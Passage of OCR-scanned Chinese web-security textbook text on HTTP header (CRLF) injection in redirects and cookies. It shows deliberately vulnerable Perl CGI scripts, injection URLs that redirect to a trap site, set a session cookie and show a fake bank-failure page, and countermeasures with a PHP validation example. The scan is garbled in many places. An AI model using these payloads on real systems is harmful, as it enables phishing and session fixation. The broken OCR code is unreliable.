门 用 于 输出 消息 头 的 程序 库 或 API。 并 且 还 要 校 验 组 成 响应 消息 头 的 字符 串 中 是 否 包 含 换行 符 ， 
如 果 有 换行 符 就 报错 并 终止 处 理 。 


HTTP 消息 息 头 注入 漏洞 总 i 览 


产生 地 点 
重 定向 或 生成 Cookie 等 基于 外 部 传 入 的 参数 输出 HTTP 响应 头 的 地 方 























二 = 影响 范围 
广 恒 | 虽然 受到 直接 影响 的 是 存在 漏洞 的 页 面 ， 但 是 当 攻击 者 通过 执行 任意 的 JavaScript 而 进行 伪装 攻 


后 ， 最 终 应 用 的 所 有 页 面 都 会 受到 影响 










































































| 








可 


也 


依 影响 类 型 
伪装 、 显 示 伪 造 页 面 、 缓 存 污 染 


人 和 


用 户 参 与 程度 
需要 一 浏览 恶意 网 页 ， 点 击 邮件 中 附属 的 链接 等 
























































| 对 策 概要 
以 下 二 选 一 - 不 将 外 界 传 入 的 参数 作为 HTTP 响应 头 输 出 - 使 用 重 定 向 或 生成 Cookie 的 专用 程 


序 库 或 APl， 并 校 验 参数 中 的 换行 符 


















































攻击 手段 与 影响 
接 下 来 就 让 我 们 来 看 一 下 针对 HTTP 消息 头 注入 漏洞 的 攻击 手段 及 其 影响 。 这 里 我 们 以 执行 
重 定向 处 理 的 Perl 脚本 为 例 进行 说 明 。 之 所 以 用 Perl， 是 因为 PHP 实施 了 一 些 HTTP 消息 头 注 
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入 的 防范 策略 ， 很 难 用 一 个 简单 的 例子 将 漏洞 重 现 。 但 是 ， 使 用 PHP 同样 会 遭受 HTTP 消息 头 
注入 攻击 ， 相 关 信 息 及 防范 策略 将 在 本 节 的 最 后 介绍 。 

以 下 CGI 脚本 的 作用 为 接收 查询 字符 串 中 url 的 值 ， 并 重 定向 至 url 所 指定 的 URL。 这 里 
还 针对 URL 实施 了 与 前 面 介 绍 的 “失败 例 3” 同 样 的 域名 校 验 。 


代码 清单 ”、/47/47-020.cgi 





#!/usr/bin/perl 


























use utf8; # 指定 Perl 源码 的 字符 编码 为 UTF-8 
use strict; # 指定 严格 的 变量 定义 方式 
use CGI qw/-no xhtml :standard/; # 使 用 cGI 模块 























my $cgi = new CGI; 
my $url = $cgi->param('url'); # 取得 查询 字符 串 url 




















ul 











# 通过 前 方 一 致 校 验 URL 来 防范 自由 重 定向 ( 不 充分 的 防范 策略 ) 
if ($url =~ /http:\/\/example\.jp\//) { 
print "Location: $url\n\n"; 























exit 0; 
} 
## URL 不 正确 时 的 错误 消息 
print <<END OF HTML; 
Content-Type: text/html; charset=UTF-8 











<body> 

Bad URL 
</body> 
END OF HTML 











正常 情况 下 的 画面 跳 转 如 下 图 所 示 。 
4-63 ”示例 画面 跳 转 


二 
书 -Windows Internet Explorer 








47-020.cgi?url=http://example.jp/47/47-003.php 





OO- | 回 gpun=httpy/examplejp/4a7/47-003.php ~ | 宁 | X| 
we | | 









































, 重 定向 至 47-003.php 
47-003.php 

息 认证 成 功 - Windows Internet Explorer 己 [ 回 | RT 
© [rp//examplejp/a7/a7-003.php -|?|xj 回 soo p -| 

















突 收 天 | 着 记功 [ IA(O) ~ 

















4.7 时 


名 








令 重 定向 至 外 部 域名 





向 相关 的 安全 隐患 


下 面 我 们 使 用 以 下 URL 执行 此 CGI 脚本， 首先 请 启动 Fiddler。 这 个 URL 很 长 ， 不 想 手 动 
人 


链接 。 





example.com/47/47-900.php 





http://example.jp/47/47-020.cgi?url=http://example.jp/%0D%$0ALocation:+http://trap. 











这 样 执行 之 后 ， 浏 览 需 就 会 路 转 到 恶意 网 站 。 请 注意 看 地 址 栏 。 


4-64 恶意 网 页 























[ 辣 本 Window Intemet Explorer el 
加 口 - 四 htpy/rap.examplecom/47/47-900php * | ee BB) httpy//trap.example.com/a7/47-900.php ~ [3 | x ||[S aing pr 
交 届 a | 丰富 加 : IR(O)™ 














用 户 名 或 密码 有 误 。 请 重新 输入 。 


用 户 名 | 
密码 




















不 可 思议 的 是 ， 明 明 已 经 对 重 定向 的 URL 进行 了 前 方 一 致 的 校 验 ， 为 什么 还 
果 呢 ?为 了 查 明 真相 ， 我 们 来 使 用 Fiddler 查看 HTTP 响应 内 容 。 


4-65 使 用 Fiddler 确认 HTTP 响应 
[小 Fiddler - HTTP Debugging Proxy ex ) 


Eile Edit Rules Iools Yiew Help 
Comment #7 Reissue X Remove » Pb Resume All | 时 Streaming BN AutoDecode | 图 Process Filter 前 Find 区 Save | 和 愿 Launch IE 俄 dlear Cache 当 
































和 和 | 区 3 | 外 Statistics | HO Inspectors 系 autoResponder | Request Builder | 目 Log | v| Filters I 一 Timeline 
玲 Result Protocol Host URL 

















Headers | Textyiew | WebForms | Hexwiew | Auth Raw | XML 


Ek | GET http://example. in/47747-020, cqi?uri=http: //example, 1p/XO0NOAL ocation: +http: //trap, example 人 
器 回 200 HTIP trap,exa,, 7-900,php 目 IAccept: image/gif, image/x-xbitmap, imageAjpegy imageZpjpeg， app1icationx-ms-app1ication， 引 一 
htips //example. jp/477 











Referer: htt 
Accept-Language: ja 





UA-CPU: X86 | 
Accept-Encoding: gzip, deflar | 到 
User-Agent: Mos i Me 0 oie MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.5C| 
选择 Connection: Keep-Ali | 


Host: example. jp | 
cookie: PHPSESSID=visplaat7nho9q2pottpbd9kos EE 

















Transformer | Headers | Textyiew | Imageyiew | HexYiew | | 


Webyview | Auth | Caching | Privacy ||Raw | xML 





HTTPA1.1 302 Fou 
Date: wed, 09 Ee 2011 09:34:21 GMT 
Server: Apache/2. 2.14 (CUbuntu) 


/trap, example. Com/47/47-300. 0hp | < 一 








Keep-Alive: imeoutT15， max=100 
connection: Keep-Ali 
Content-Type: Et /hm ; ; Charset=iso-8859-1 





<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 





















































<title>302 Found</title> 
a i ] </head> <body> Sa 
EE Dee] 
流 Capturing 去 MllProcesses 112 http://example,jpi47/47-020,cgi?url=http: /example,ip/%0D%OALocation:+http: /itrap.example,comj47/47-900,.php 
上 二 | 








如 下 所 示 ，Location 消息 头 指 向 了 恶意 网 站 ， 而 原来 的 Location 消息 头 却 不 见 了 。 


出 现 这 种 结 





Location: http://trap.example.com/47/47-900.php 





























160 | 第 4 章 Web 应 的 各 种 安全 隐患 








其 实 ， 造 成 这 个 谜 题 的 关键 为 ，CGI 脚本 里 面 指定 的 查询 字符 串 url 中 包含 了 换行 符 
( %0D%0A )。 该 换行 符 使 得 CGI 脚本 输出 了 2 行 Location 消息 头 ， 如 下 所 示 。 








Location: http://example.jp/ 
Location: http://trap.example.com/47/47-900.php 

















Apache 从 CGI 脚本 中 接收 的 消息 头 中 如 果 有 多 个 Location 消息 头 ，Apache 就 会 只 将 最 后 的 
Location 消息 头 作为 响应 返回 ， 因 此 ， 原 来 的 重 定向 目标 就 会 作废 ， 而 被 换行 符 后 面 指定 的 URL 
取而代之 。 

像 这 样 ， 通 过 在 参数 中 插入 换行 符 而 添加 新 的 HTTP 响应 头 的 攻击 手段 就 是 HTTP 消息 头 注 
入 攻击 ， 而 招致 HTTP 消息 头 注 入 攻击 的 漏洞 就 叫 HTTP 消息 头 注 入 漏洞 。 有 时 为 了 侧重 攻击 手 
法 或 现象 ， 也 会 将 其 称 为 CrLf 注 入 攻击 或 HTTP 响应 截断 攻击 。 








专栏 : HTTP 响应 截断 攻击 COLUMN 


HTTP 响应 截断 攻击 ( HTTP Response Splitting Attack ) 的 攻击 手段 为 ， 通 过 HTTP 消息 头 
注入 生成 多 个 HTTP 响应 ， 使 缓存 服务 器 ( 代理 服务 器 ) 将 伪造 内 容 进 行 缓存 。 

HTTP/1.1 能 够 在 一 次 连接 中 发 送 多 个 请 求 ， 而 且 响 应 也 会 在 一 个 连接 中 被 返回 。 于 是 ， 攻 
击 者 就 会 在 执行 HTTP 消息 头 注入 攻击 所 使 用 的 HTTP 请 求 ( 第 1 请 求 ) 后 面 ， 加 上 使 服务 器 组 
存 伪造 内 容 的 URL 所 对 应 的 HTTP 请 求 ( 第 2 请 求 )。 

这 时 ， 通 过 对 第 1 请 求 进 行 HTTP 消息 头 注 入 攻击 ， 在 HTTP 响应 消息 体 中 插入 伪造 内 容 ， 
缓存 服务 器 就 会 将 这 个 伪造 内 容 误 认为 第 2 请 求 的 响应 而 将 其 缓存 。 由 于 此 攻击 能 够 使 用 伪造 物 
来 污染 缓存 中 的 内 容 ， 因 此 也 被 称 为 缓存 污染 。 

虽然 单独 使 用 HTTP 消息 头 注 入 攻击 也 能 达到 改变 页 面 的 效果 ， 但 是 那 种 情况 下 只 有 被 攻击 
的 用 户 才 会 受到 短暂 的 影响 。 与 此 相对 ， 污 染 缓存 则 可 以 增加 受 影响 的 用 户 群 ， 并 且 还 能 够 延长 
受 影响 的 时 间 ， 从 而 使 攻击 的 威力 大 增 。 

HTTP 响应 截断 的 产生 原因 与 对 策 与 HTTP 消息 头 注入 相同 ， 因 此 这 里 就 不 再 进行 详 述 。 如 
果 有 兴趣 ,可 以 参考 独立 行政 法 人 信息 处 理 推进 机 构 发 表 的 《安全 的 Web 网 站 构建 方法 六 的 “1.7 
HTTP 消息 头 注 入 ”中 的 “缓存 服务 器 的 缓存 污染 "。 
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令 生 成 任意 Cookie 

这 里 我 们 依然 使 用 47-020.cgi 来 看 看 HTTP 消息 头 注 入 造成 的 其 他 影响 。 首 先 ， 使 用 以 下 
URL 启动 CGI 脚本 ， 或 者 从 菜单 ( http://example.jp/47/ ) 中 点 击 “5. 47-020:CGI 的 重 定向 (设置 
Cookie )” 链接 。 








中 原 标题 为 “安全 太 咏 工 了 计 人 下 外 作 ) 方 ”。URL : http://wwwipa.go.jp/security/vuln/websecurity.html。 








4.7 








定向 相关 的 安 4 








Cookie:+SESSID=ABCD123 





http://example.jp/47/47-020.cgi?url=http://example.jp/47/47-003 .php%$0D%0ASet- 








此 时 ，HTTP 响应 如 下 图 的 Fiddler 界面 所 示 。 
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r ry 
药 Fiddler - HTTP Debugging Proxy ex 
Eile Edit Rules Tools Yiew Help 
Comment #7 Reissue X Remove » b Resume All | 名 Streaming AutoDecode | 图 Process Filter 前 Find 加 5ave | 愿 Launch IE 俄 Clear Cache 
SE | << | © statistics| WW Inspectors | ££ AutoResponder | Sn Request Buider | Log | 回 Fiters | = Timeline| 
间 Resuk Protocol Host_URL Headers | Textview | WebForms | Hexview | Auth |[Raw | XML 


1 i Cl ENA [SET htth: /exanmple. 10747747-030, cqi3urT=htth: //example. 10747747-003. PNpXODNOASet -Cookie: tf ~ 


[nh 
可 





IAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-appilication, — 
Referer: http://example. ip/47/ | 
IAccept-Language: ja | 
UA-CPU: x86 

IAccept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0, 
Connection: Keep-Alive 

Host: example. jp 





tat ; 


[Fnd… I View in Notepad ] 


Transformer | Headers | Textyiew | ImageView | Hexview | Webview | Auth | Caching | Privacy | |Raw 
xML | 








HTTP/1.1 302 _ Found 

Date: Fri, 1 2 OAD GMT 

server: Apache/2.2.14 CUbuntu 

Set-Cookie: SESSID=ABCD123 -有 
[Location: htrp;//example,. ip/47/47-003.php 
content-Length: 215 

Keep-Alive: timeout=5, max=100 

connection: Keep-Alive 

content-Type: text/html; charset=iso-8859-1 


<!1DOCTYPE HTML PUBLIC "~-//IETF//DTD HTML 2.0//EN"> 

<html><head> 

<title>302 Found</title> 

</head> <body> 

<hi>Found</hi> 

<p>The document has moved <a href="http://example. jp/47/47-003.php">here</a .</p> 
</body> </html> wa 


[Fn I View in Notepad ] 


滔 capturing ”三 Processes 112 http:jjexample,jp147147-020.cgpurl=http:jjexample,jp147147-003,.php%0D3%50A5et-Cookie:+5ES5ID=ABCD123 


将 图 中 箭头 所 指 的 地 方 放大 ， 如 下 所 示 。 





下 



































上 











Set-Cookie: SESSID=ABCD123 
Location: http://example.jp/47/47-003 .php 











可 以 看 出 HTTP 消息 头 注 入 攻击 中 添加 的 Set-Cookie 消息 头 生 效 了 。 而 随后 的 HTTP 请 求 则 


如 图 4-67 所 示 。 


4-67 通过 Fiddler 确认 随后 的 HTTP 请 求 

















站 | 
潍 Fiddler - HTTP Debugging Proxy [ET 二 | 
Eile Edit Rules Iools Yiew Help 
Comment #7 Reissue X Remove ”ResumeAll | 时 streaming 区 Autobecode | @ erocess filter 鹊 Find 加 Save | 看 Launch IE 作 Clear Cache 中 
Web Sessions 
































statistics | WM Inspectors | £ AutoResponder | 8 Request Buider | 国 Log | 回 Fiters | = Timeline 
Headers | TextYiew | WebForms | Hexyiew | Auth |[Raw | xML | 
IGET http://example. jp/47/47-003.php HTTP/1.1 


IAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, | 
Referer: http://example. ip/47/ 











兴 Result Protocol Host URL 











Accept-Encoding: 人 deflate 司 
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0, 
Connection: Keep-Alive 
Host: example. 


小 芭 cookie: si53aco>3 -二 一 














mr 








同样 将 图 中 箭头 所 指 的 地 方 放 大 ， 如 下 所 示 。 可 以 看 出 前 面 生成 的 Cookie 确实 被 设置 到 了 


浏览 需 中 。 
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Cookie: SESSID=ABCD123 














而 一 旦 外 界 能 够 随意 生成 Cookie 值 ， 就 能 配合 4.6 节 介 绍 的 会 话 固 定 攻 击 来 针对 用 户 发 动 
伪装 攻击 。 


多 显示 伪造 页 面 
通过 HTTP 消息 头 注入 攻击 还 能 够 显示 伪造 页 面 。 由 于 针对 重 定向 处 理 页 面 的 攻击 不 太 容 易 
实现 了， 因此 ， 这 里 我 们 选择 以 生成 Cookie 的 CGI 脚本 为 例 ， 来 示范 如 何 显示 伪造 页 面 。 





























代码 清单 ”/47/47-021.cgi 





#!/usr/bin/perl 

use utf8; 

use strict,; 

use CGI qw/-no xhtml :standard/; 
use Encode Gdqw (encoae decode); 


my $cgi = new CGI; 
my S$pageid = $cgi->param('pageid'); 


# encode 通过 encode 函数 将 编码 转换 为 UTF-8 后 输出 
print encode('UTF-8', <<END OF HTML); 
Content-Type: text/html; charset=UTF-8 
Set-Cookie: PAGEID=$pageid 


<body> 

已 设置 Cookie 值 
</body> 
END OF HTML 














这 段 脚本 中 接收 了 名 为 pageid 的 查询 字符 串 ， 并 将 其 原封 不 动 地 生成 了 名 为 PAGEID 的 
Cookie。 


首先 ， 为 了 确认 脚本 在 正常 情况 下 的 执行 结果 ， 使 用 以 下 URL 启动 脚本 。 











http://example.jp/47/47-021.cgi?pageid=P123 











此 时 Fiddler 的 界面 显示 如 下 。 





中 CGI 脚 本 中 一 旦 生成 Location 消息 头 ，HTTP 状态 码 就 会 被 自动 设置 成 302。 而 要 成 功 显示 伪造 页 面 ， 就 必须 在 CGI 
脚本 中 将 状态 码 强 制 更 改 为 200， 但 这 在 现在 的 Apache 中 是 很 难 做 到 的 。 


4.7 














中 
名 
可 
部 
冰 
他 
冲 
部 
a 
0 


4-68 通过 Fiddler 确认 HTTP 响应 


? Fiddler - HTTP Debugging Proxy 











File Edit Rules Iools View Help 


Comment #7 Reissue X Remove » bp Resume All | 时 Streaming BAutoDecode | 图 Process Filter 前 Find 区 Save | 古 Launch IE 铬 clear Cache 二 


Web Sessions << | statistics| MW Inspectors | £ AutoResponder | 8 Request Buider | 是 Log | 回 Fkers| = Tmeinel 
Result Protocol best RE Headers | Textyiew | WebForms | Hexyiew | Auth |[Raw | xML | 


IGET http://example. ip/47/47-021.cgqi?pageid=P123 HTTP/1.1 的 
IAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, — 
Referer: http://example. ip/47 

Accept-Language: ja 

UA-CPU: x86 | 至 
IAccept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0, 
Connection: Keep-Alive 

Host: example. jp 





















































内 
簿 





上 
Wiew in Notepad 











Transformer | Headers | TextView | ImageView | Hexyiew | Webyiew | Auth | Caching | Privacy || Raw 
xML | 





HTTP/1.1 200 OK 因 
Date: Fri, 17 Sep 2010 06:17:19 GMT 一 
Server: Apache/2.2.14 (Ubuntu) 

Set-Cookie: PAGEID=P123 

Keep-Alive: timeout=5, max=100 
connection: Keep-Alive 

Content-Type: text/html; charset=UTF-8 
Content-Length: 55 


几 





















































<bo 中 
六 2 才 一 信 态 七 中 去 L 大 
[</body> 到 
4 [ 咱 | 上 
ss | [a [ View in Notepad ] 
汗 Capturing 去 刘 Processes 和 http:j/example,jp/47/47-021.cgi?pageid=P123 
上 











| 


能 看 到 这 里 生成 了 PAGEID=P123 的 Cookie 值 。 
下 面 我 们 就 来 尝试 攻击 该 CGI 脚本， 以 使 其 显示 伪造 页 面 。 使 用 以 下 URL 执行 脚本 ， 如 果 


不 想 手动 输入 ， 可 以 在 http://example.jp/47/ 中 点 击 “7. 47-021:CGI 中 设置 Cookie ( 伪造 页 面 了 了 
链接 。 





http://example.jp/47/47-021.cgi?pageid=P%0D%0A%0D%S0ASe2%97%8b%e2%97%8b%e9%s8as80%e8s 
al%8c%e3%81%afgse7sa0gsb4se7s94%a3%se3%s81%97%e3%81%bese3%s81%97%e3%s81%sf 











下 图 即 为 执行 后 的 页 面 显示 。 


4-69 ”伪造 画面 


和 
咎 http//examplejp/47/47-021.cgi?pageid=P%0D%0A%0D%0Ao - Windows Internet Ex... [EI®] 有 

















仿 品 -> | 团 htpy/examplejp/47/47-021.cgizpageid=p3e0D%0A “| 人 女 | X ||S sing pr 


























窑 收 5 夫 | 大 htp//examplejp/47/47-021cgi?pageid=p%.. | | IA(O) ~ 








00 银 行 宣布 破产 已 设 定 Cookie 值 

















此 时 ，HTTP 消息 如 下 图 所 示 。 





UU 
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4-70 通过 Fiddler 确认 HTTP 响应 
[如 Fiddler - HTTP Debugging Proxy [eIel ¥ jel 








File Edit Rules Tools View Help 
蝇 生 Reissue X- 》 Resume All EE Streaming 汶 AutoDecode | 时 Process Hper 的 Fnd 区 Save | 芒 Launch IE 依 Clear Cache 站 Encoder | 因 Tearoff | 








» 






































Web Sessions << || © sttstcs| WM inspectors | £ AutoResponder | GW RequestBuider [让 Fiters | tog | = Timeine 
学 Result_ Protocol Host 二 Headers | Textview | WebForms | Hexview | Auth |[Raw | XM | 
BEE 200_HTP example.ip 用 [SET htto:/ /exampie. iD/47747-021. cai7Dadeid PO WIA NIA nen 7 Nal ial 





Host: example.jp 
Connection: keep-alive 

|Accept: text/html,application/xhtml+xm],application/xm]l;q=0.9,image/webp,*/*; 

User -Agent: Mozilia a/5.0 Cr NT 6.1j ApplewebKkit/537.36 (KHT™ML, 1ike Geckoy Vehrome/31. 0.1650.63 
Referer: htEE example. 了 7 

|Accept- 二 gzip, ee sdch 

|Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6,en-UY5;q=0.4,en;q=0.2 


选择 cookie: PAGEID=P 中 
4 加 ] 上 
Find… ViewinNotepad 


:| 

















Transformer | Headers | TextView | ImageView | HexView | WebView | Auth Cadhing | Privacy ||Raw XML 


司 RawFile htm - 记事 本 [sls| % 


文件 月 ”篇 妆 日“ 相 式 (O) 喜 看 MW) 孝 助 (H) 








Set-Cookie: PAGEID=P 

Vary: Accept-Encoding 

Content-Length: 102 

Keep-Alive: timeout=15, max=100 
Conmnection: Keep-Alive 

Content-Type: text/html; charset=UTF-8 


已 设 定 Cookie 值 


</body> 














” Viewin Notepad 























979%8b3%e99%8a3%809%e836al968c9%ee39%6819baf9oe796a09b* 




















在 Set-Cookie 消息 头 后 面 连续 输出 两 个 换行 时 ， 后 面 的 数据 就 会 被 视 为 消息 体 。 

如 果 不 加 修饰 ， 这 里 就 依然 能 够 看 到 原来 的 页 面 ， 但 正如 4.3.1 节 所 介绍 的 那样 ， 通 过 CSS 
等 手段 是 能 将 原来 的 页 面 隐 藏 的 。 

另外 ， 虽 然 本 例 中 只 是 在 页 面 上 显示 了 某 银行 破产 的 谣言 ， 但 如 果 更 进一步 的 话 ， 通 过 制作 
伪造 的 表单 来 窃取 个 人 信息 的 钓鱼 式 攻击 、 ee 6 够 
实现 的 。 换 言 之 ，HTTP 消息 涉 注入 造成 的 页 面 被 筑 改 ， 造成 与 XSS 同样 的 影响 。 























安全 隐患 的 产生 原因 

HTTP 响应 头 信息 能 够 以 文本 格式 逐 行 定 义 消息 头 ， 也 就 是 说 消息 头 之 间 互 相 以 换行 符 相 
隔 。 而 如 果 攻 击 者 恶意 利用 该 特性 ， 在 指定 重 定 向 目标 URL 或 Cookie 值 的 参数 中 插入 换行 符 ， 
日 该 换行 符 又 被 直接 作为 响应 输出 的 话 ， 就 会 产生 HTTP 消息 头 注入 漏洞 。 
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URL 和 Cookie 中 本 身 可 不 可 以 包含 换行 符 呢 ? 首 先 ， 标 准 规格 中 规定 了 URL 不 能 包含 换 
行 符 。 因 为 查询 字符 串 中 包含 换行 符 时 会 被 百 分 号 编码 为 %0D%0A， 而 重 定 向 处 理 中 传递 URL 
时 照 理 已 经 执行 过 了 百 分 号 编码 ， 因 此 URL 中 有 换行 符 是 不 正常 的 。 

另 一 方面 ，Cookie 值 中 有 时 则 需要 加 入 换行 符 。 而 由 于 Cookie 值 中 除了 不 能 有 换行 符 ， 也 
不 能 包含 空格 、 喜 号 或 分 号 ， 因 此 习惯 对 Cookie 值 进行 百 分 号 编码 ?。 百 分 号 编码 后 ， 换 行 符 
被 编码 为 %0D%0A， 也 就 不 会 产生 HTTP 消息 头 注 入 漏洞 了 。 

































































































































































对 策 
针对 HTTP 消息 头 注入 漏洞 ， 最 可 靠 的 对 策 就 是 不 将 外 界 传 入 的 参数 > 作为 HTTP 响应 消息 
头 输出 。 


令 对 策 1: 不 将 外 界 参数 作为 HTTP 响应 消息 头 输出 

绝 大 多 数 情 况 下 ， 经 过 重新 进行 设计 评估 后 ， 都 能 够 做 到 不 将 外 界 参数 作为 HITP 响应 消息 
头 输出 。Web 应 用 中 会 用 到 输出 HTTP 响应 消息 头 的 骨 型 功能 为 重 定 向 和 生成 Cookie， 而 只 要 
遵循 以 下 方针 ， 就 能 大 幅 减 少 直接 将 外 界 参数 作为 消息 头 输出 的 机 会 。 


不 直接 使 用 URL 指定 重 定向 目标 ， 而 是 将 其 固定 或 通过 编号 等 方式 来 指定 

使 用 Web 应 用 开发 工具 中 提供 的 会 话 变量 来 移交 URL 

因此 ， 在 设计 阶段 就 应 该 尽量 不 把 外 界 参数 作为 HTTP 响应 消息 头 输出 。 而 如 果 无 论 如 何 都 
必须 将 外 界 参数 输出 到 HTTP 响应 消息 头 中 的 话 ， 可 以 参考 以 下 对 策 。 


























令 对 策 2: 执行 以 下 两 项 内 容 
由 专门 的 API 来 进行 重 定向 或 生成 Cookie 的 处 理 
校 验 生 成 消息 头 的 参数 中 的 换行 符 


下 面 我 们 就 来 对 这 两 项 内 容 进行 详细 解说 。 
仿 由 专门 的 API 来 进行 重 定向 或 生成 Cookie 的 处 理 


CGI 脚本 中 能 够 使 用 print 等 语句 直接 记述 HTTP 响应 消息 头 ， 但 是 使 用 这 种 方法 需要 严 
格 遵守 HITP 和 Cookie 等 的 标准 规格 ， 否 则 就 可 能 会 导致 安全 隐患 等 Bug 的 产生 。 























四 Netscape 公司 的 Cookie 规格 中 有 如 下 记载 : This string is a sequence of characters excluding semi-colon, comma and white 
space. Ifthere is aneed to place such data in the name or value, some encoding method such as URL style %XX encoding is 
recommended, though no encoding is defined or required. 

四 ”外界 传 入 的 参数 的 一 个 典型 的 例子 就 是 HTTP 请 求 中 的 值 ， 除 此 之 外 ， 也 包括 经 过 电子 邮件 或 数据 库 等 从 外 部 发 送 
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Perl 语言 的 CGI 模块 或 PHP 等 Web 应 用 开发 语言 或 程序 库 中 提供 了 功能 丰富 的 函数 ， 通 过 
使 用 这 些 函数 输出 HTTP 消息 头 ， 原 则 上 就 能 够 防范 安全 隐患 。 表 4-16 归纳 了 各 语言 中 提供 的 
输出 HTTP 消息 头 的 功能 。 但 需要 注意 的 是 ， 应 当 尽 量 利用 生成 Cookie 以 及 重 定向 功能 的 程序 
库 ， 程 序 库 中 未 提供 的 情况 下 才 使 用 输出 响应 消息 头 的 功能 。 


表 4-16 各 语言 中 提供 的 输出 HTTP 响应 消息 头 的 功能 



























































语言 生成 Cookie 重 定向 输出 响应 消息 头 
PHP setcookie / setrowcookie 无 (利用 header ) header 
Perl+CGl.pm | CGl::Cookie redirect header 





Java Servlet | HttpServletResponse#addCookie | HttpServletResponse# | HttpServletResponse#setHeader 
sendRedirect 




















ASP.NET Response.Cookies.Add Response.Redirect Response.AppendHeader 





使 用 了 这 些 程序 库 后 ， 理 想 状 态 下 就 能 消除 HTTP 消息 关注 入 漏洞 了 。 然 而 遗憾 的 是 ， 现 实 
中 即使 利用 了 上 面 这 些 功 能 ， 有 时 也 无 法 完全 杜绝 安 全 隐患 。 
因此 ， 我 们 需要 同时 实施 以 下 对 策 。 


人 检验 生成 消息 头 的 参数 中 的 换行 符 

HTTP 响应 消息 头 相关 的 API 中 很 多 都 没有 检验 换行 符 。 而 在 笔者 看 来 ， 之 所 以 出 现 这 种 情 
况 ， 大 概 是 因为 业界 就 究竟 该 由 API (程序 库 ) 还 是 应 用 方面 来 负责 HTTP 消息 头 注入 这 一 问题 
还 没有 达成 共识 。 虽 然 笔 者 的 观点 是 应 该 由 API 方面 负责 ， 但 是 由 于 目前 API 方 面 做 的 还 不 够 
充分 ， 因 此， 为 了 保护 自己 ,我 们 就 不 得 不 在 应 用 方面 多 下 功夫 。 

针对 换行 符 的 处 理 方法 有 如 下 两 种 。 


URL 中 含有 换行 符 时 就 报错 
将 Cookie 中 的 换行 符 进 行 百 分 号 编码 


如 果 程 序 库 中 已 经 对 Cookie 值 进行 了 百 分 号 编码 ， 那 么 应 用 中 就 可 以 省 去 这 一 操作 。PHP 
的 setcookie 函数 和 Perl 的 CGI: :Cookie 模块 会 在 程序 库 中 对 Cookie 值 进 行 百 分 号 编码 。 
使 用 其 他 的 语言 或 程序 库 时 ， 请 事先 调查 Cookie 值 是 否 会 被 百 分 号 编码 。 

接 下 来 就 让 我 们 看 一 下 通过 PHP 的 header 函数 来 实现 包含 字符 种 类 校 验 功 能 的 重 定 向 函 
数 的 示例 。 


代码 清单 ”/47/47-030.php 


















































<?php 
// 定义 重 定向 函数 
function redirect ($url) { 
// URL 中 含有 非法 字符 时 就 报错 并 中 止 处 理 
if (! mb ereg("\\A[- .!~*'();\\/?:@&=+\\$,%#a-zA-20-9] +\\z", $url)) { 
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die('Bad URL'); 
} 
header('Location: ' . $url); 
} 
// 调用 示例 
$url a Laset (Ss CET VEL .3 SGETLVELT Fd "Vy 
redirect ($url); 























汪汪 








这 段 脚 本 定义 了 名 为 redirect 的 函数 ， 函 数 中 会 校 验 URL 的 字符 种 类 ， 只 在 校 验 通过 的 
情况 下 才能 使 用 header 函数 执行 重 定向 操作 。 

但 是 ，redirect 函数 内 仅 进 行 了 字符 种 类 的 校 验 ， 并 没有 校 验 URL 的 格式 是 否 正确 。 男 
外 ， 此 处 的 字符 种 类 校 验 规则 比 RFC3986 还 要 严格 ， 指 定 了 Pv6 的 IP 地 址 时 [ 和 ] 都 会 被 报错 。 
因此 ， 在 进行 操作 时 ， 应 该 根据 实际 用 途 来 调整 具体 的 校 验 规则 。 





专栏 : PHP 的 header 函数 中 进行 的 换行 符 校 验 COLUMN 


根据 PHP 的 官方 文档 ”,，4.4.2 以 及 5.1.2 版 本 的 header 函数 的 更 新 日 志 中 有 如 下 记载 ,为 
了 防范 消息 头 注 入 攻击 ， 该 函数 不 能 一 次 发 送 多 个 消息 头 ”。 
但 是 ， 作 为 消息 头 注 入 攻击 的 应 对 策略 ， 这 个 方法 并 不 充分 。PHP 中 校 验 换行 符 时 仅 校 验 
了 上 LF ( 0x0A )， 而 没有 校 验 CR ( 0x0D ) ( 确认 于 PHP 5.3.5 )。 因此， 在 部 分 用 户 的 浏览 器 上 ， 
仅 使 用 CR 换行 符 的 HTTP 消息 头 注入 攻击 仍然 是 有 效 的 。 

笔者 调查 后 发 现 ， 针 对 Internet Explorer、Google Chrome、Opera 这 3 种 浏览 器 ， 实 施 仅 
使 用 CR 换行 符 的 HTTP 消息 头 注入 攻击 都 能 够 取得 成 功 ， 而 在 Firefox 和 Apple Safari 中 攻击 
则 没有 奏效 。 
而 从 以 上 事实 中 也 能 够 看 出 ， 仅 依靠 PHP 的 header 函数 中 的 校 验 来 实现 重 定向 处 理 是 存 
在 危险 的 。 



























































二 
























































































































































4.7.3 重 定向 相关 的 安全 隐患 总 结 


重 定向 处 理 中 产生 的 典型 安全 隐患 为 自由 重 定向 漏洞 和 HTTP 消息 头 注 入 漏洞 。 
针对 这 两 个 漏洞 的 对 策 可 归纳 如 下 。 


重 定向 处 理 尽量 使 用 专门 的 API (程序 库 函 数 ) 
以 下 任 选 其 一 
固定 重 定 向 目标 (推荐 ) 
重 定向 目标 URL 由 外 界 指定 时 ， 务 必 校 验 字符 种 类 和 域名 





























OD http://us2.php.net/manual/zh/function.header.php 
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4.8 Cookie 输出 相关 的 安全 隐患 





Web 应 用 中 广泛 使 用 Cookie 来 进行 会 话 管理 ， 而 如 果 Cookie 的 使 用 方法 不 当 就 会 滋生 安全 
隐患 。 与 Cookie 相关 的 安全 隐患 大 致 可 分 为 以 下 两 类 。 
Cookie 的 用 途 不 当 
Cookie 的 输出 方法 不 当 
